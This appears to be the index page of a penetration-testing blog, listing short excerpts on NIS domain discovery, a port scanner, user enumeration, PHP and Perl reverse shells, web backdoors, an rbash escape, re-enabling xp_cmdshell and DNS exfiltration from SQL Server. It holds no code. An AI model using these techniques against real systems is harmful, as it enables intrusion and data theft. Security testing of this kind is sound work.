Finding the NIS Domain Name from Bootparamd
NIS (Network Information Service) is not a particularly common protocol on modern internal networks. This is for good reason really consider its security weaknesses. Its presense is often a gift to penetration testers (and probably hackers too). This blog entry briefly documents one way that all important NIS Domain Name can be found remotely.
Yapscan Update: Scan Unlimited Hosts
Previous versions of yapscan had an annoying habbit of consuming large amounts of memory if you tried to do a really big portscan. The latest version calculates the amount of memory that will be required, and if it’s above a user-configurable maximum (150MB by default), it breaks the scan into smaller chunks. Download the latest […]
Windows User Enumeration for Time Restricted Accounts
Sid released an advisory about an interesting username enumeration vulnerability over the weekend: notsosecure.com Username enumeration vulnerabilities are a classic mistake that vendors seem fated to repeat. It’s surprising to see one in such a mature product, though. Well spotted, Sid.
php-reverse-shell
This tool is designed for those situations during a pentest where you have upload access to a webserver that’s running PHP. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host […]
perl-reverse-shell
This tool is designed for those situations during a pentest where you have upload access to a webserver that’s running PERL. Upload this script to somewhere in the web root then run it by accessing the appropriate URL in your browser. The script will open an outbound TCP connection from the webserver to a host […]
The Perfect Web Backdoor
I’m sure most pentesters have had cause to use the likes of cmdasp.asp, or cobble together a simple PHP script based around “passthru” or “system”. There’s loads more functionality that would be useful in such backdoors, though. They could be made less dangerous by building in authentication, and more functional by building in database client […]
Breaking out of rbash using scp
I was recently challenged to break out of a restricted shellenvironment in which the only accessible command was scp.
Enabling xp_cmdshell for SQL Server 2005
It’s disappointing to exploit a SQL injection, find you’re “sa”, then realise they’ve disabled xp_cmdshell (the default for MSSQL 2005). Fortunately, it’s possible to re-enable it quite easily…
Exfiltrating Data From MS SQL Server Via DNS
Exfiltrating data via Blind SQL Injection vulnerabilities can be slow, or the very least undesirably noisy. DNS may provide a faster alternative if the target system is connected to the Internet.